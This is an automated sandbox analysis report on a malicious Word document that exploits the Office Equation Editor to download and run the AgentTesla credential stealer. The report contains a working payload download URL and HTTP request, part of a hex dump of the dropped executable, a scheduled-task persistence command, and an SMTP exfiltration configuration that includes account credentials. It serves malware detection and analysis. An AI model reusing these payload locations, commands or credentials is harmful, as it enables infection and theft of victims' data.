Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report RFQ ..doc

Overview

General Information

Sample Name:RFQ ..doc
Analysis ID:385437
MD5:8648267830a23e39c5bc162f4ad72f85
SHA1:6a0436200203698fbb93170bb93ddc794d5f968e
SHA256:a1b7cd862762ff80cf95b544e80dfc6f887d9e0e9a8fffeec7c2574812b917d6
Tags:doc
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains very large array initializations
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Uses schtasks.exe or at.exe to add and modify task schedules
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1084 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2488 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • rghbyjuyktyjrthbgvfsfhytrrgfsd.exe (PID: 2492 cmdline: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe MD5: F5F1E2A3E5DCE186EED0352350911887)
      • schtasks.exe (PID: 2692 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cAFIUeWyVQPJe' /XML 'C:\Users\user\AppData\Local\Temp\tmpBFD6.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
  • EQNEDT32.EXE (PID: 3024 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "efiz@glimpse-it.co@Mexico1.,mail.privateemail.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000004.00000002.2097947633.00000000039FD000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000007.00000002.2350771035.0000000002BBE000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.400000.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              4.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.3aede88.4.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                4.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.3aede88.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

                  Sigma Overview

                  System Summary:

                  barindex
                  Sigma detected: EQNEDT32.EXE connecting to internetShow sources
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 203.167.7.88, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2488, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
                  Sigma detected: File Dropped By EQNEDT32EXEShow sources
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2488, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ZhIOjFmINIXbKXm[1].exe
                  Sigma detected: Scheduled temp file as task from temp locationShow sources
                  Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cAFIUeWyVQPJe' /XML 'C:\Users\user\AppData\Local\Temp\tmpBFD6.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cAFIUeWyVQPJe' /XML 'C:\Users\user\AppData\Local\Temp\tmpBFD6.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, ParentImage: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, ParentProcessId: 2492, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cAFIUeWyVQPJe' /XML 'C:\Users\user\AppData\Local\Temp\tmpBFD6.tmp', ProcessId: 2692

                  Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Antivirus detection for URL or domainShow sources
                  Source: http://rotronics.com.ph/docxxx/dec/ZhIOjFmINIXbKXm.exeAvira URL Cloud: Label: malware
                  Found malware configurationShow sources
                  Source: 7.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.400000.2.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "efiz@glimpse-it.co@Mexico1.,mail.privateemail.com"}
                  Machine Learning detection for dropped fileShow sources
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\cAFIUeWyVQPJe.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ZhIOjFmINIXbKXm[1].exeJoe Sandbox ML: detected

                  Exploits:

                  barindex
                  Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
                  Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                  Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                  Source: global trafficDNS query: name: rotronics.com.ph
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 203.167.7.88:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 203.167.7.88:80
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.54.122.60:587
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 12 Apr 2021 12:22:58 GMTServer: ApacheLast-Modified: Mon, 12 Apr 2021 05:14:50 GMTAccept-Ranges: bytesContent-Length: 733184Vary: User-AgentKeep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 aa d6 73 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 e2 0a 00 00 4c 00 00 00 00 00 00 3e 00 0b 00 00 20 00 00 00 20 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec ff 0a 00 4f 00 00 00 00 20 0b 00 e8 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 e0 0a 00 00 20 00 00 00 e2 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e8 48 00 00 00 20 0b 00 00 4a 00 00 00 e4 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0b 00 00 02 00 00 00 2e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 24 7d 00 00 18 76 00 00 03 00 00 00 01 00 00 06 3c f3 00 00 b0 0c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 1f 00 00 0a 28 20 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 21 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 22 00 00 0a 00 02 16 28 23 00 00 0a 00 02 17 28 24 00 00 0a 00 02 16 28 25 00 00 0a 00 02 16 28 26 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f ed 00 00 06 28 27 00 00 0a 00 2a 26 00 02 28 28 00 00 0a 00 2a ce 73 29 00 00 0a 80 01 00 00 04 73 2a 00 00 0a 80 02 00 00 04 73 2b 00 00 0a 80 03 00 00 04 73 2c 00 00 0a 80 04 00 00 04 73 2d 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 31 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00
                  Source: Joe Sandbox ViewIP Address: 198.54.122.60 198.54.122.60
                  Source: Joe Sandbox ViewASN Name: IWEB-ASCA IWEB-ASCA
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.54.122.60:587
                  Source: global trafficHTTP traffic detected: GET /docxxx/dec/ZhIOjFmINIXbKXm.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: rotronics.com.phConnection: Keep-Alive
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{73207C3D-FA20-48C4-87C4-17800DB89026}.tmpJump to behavior
                  Source: global trafficHTTP traffic detected: GET /docxxx/dec/ZhIOjFmINIXbKXm.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: rotronics.com.phConnection: Keep-Alive
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: unknownDNS traffic detected: queries for: rotronics.com.ph
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350816750.0000000002C06000.00000004.00000001.sdmp, rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350857695.0000000002C4E000.00000004.00000001.sdmpString found in binary or memory: http://WWI0qtWzJvCpYcgDStzT.org
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350771035.0000000002BBE000.00000004.00000001.sdmpString found in binary or memory: http://WWI0qtWzJvCpYcgDStzT.orgDL
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmpString found in binary or memory: http://ZAGYny.com
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352478215.0000000006210000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2347905343.000000000085A000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpString found in binary or memory: http://crl.lt/root-c/cacrl.crl0
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350121073.000000000298A000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2347905343.000000000085A000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000003.2190303371.00000000062C6000.00000004.00000001.sdmp, rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2347867617.00000000007EE000.00000004.00000020.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.7.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354925203.00000000083AC000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350121073.000000000298A000.00000004.00000001.sdmpString found in binary or memory: http://mail.privateemail.com
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352478215.0000000006210000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350121073.000000000298A000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpString found in binary or memory: http://repository.swisssign.com/0
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2106018219.000000000D0B0000.00000002.00000001.sdmp, rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352051934.0000000005E20000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097214520.000000000287D000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354978003.0000000008720000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2106018219.000000000D0B0000.00000002.00000001.sdmp, rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352051934.0000000005E20000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpString found in binary or memory: http://www.acabogacia.org/doc0
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpString found in binary or memory: http://www.acabogacia.org0
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpString found in binary or memory: http://www.ancert.com/cps0
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354925203.00000000083AC000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpString found in binary or memory: http://www.dnie.es/dpc0
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpString found in binary or memory: http://www.e-me.lv/repository0
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/SZSZ/0
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354925203.00000000083AC000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadis.bm0
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354925203.00000000083AC000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/cps/0
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350121073.000000000298A000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.net/docs
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exeString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWindow created: window name: CLIPBRDWNDCLASS

                  System Summary:

                  barindex
                  .NET source code contains very large array initializationsShow sources
                  Source: 7.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007b022117B2u002d3EA8u002d40F0u002dB266u002d89CB8F70EABCu007d/u00391D3F524u002d3C30u002d4A8Au002dB058u002d9A8C003E6B70.csLarge array initialization: .cctor: array initializer size 11933
                  Office equation editor drops PE fileShow sources
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ZhIOjFmINIXbKXm[1].exeJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeMemory allocated: 76E20000 page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeMemory allocated: 76D20000 page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeMemory allocated: 76E20000 page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeMemory allocated: 76D20000 page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00D54060 NtQueryInformationProcess,
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00D54059 NtQueryInformationProcess,
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00459000
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00458898
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_0045A908
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00456180
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00459A0D
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 4_2_00455208
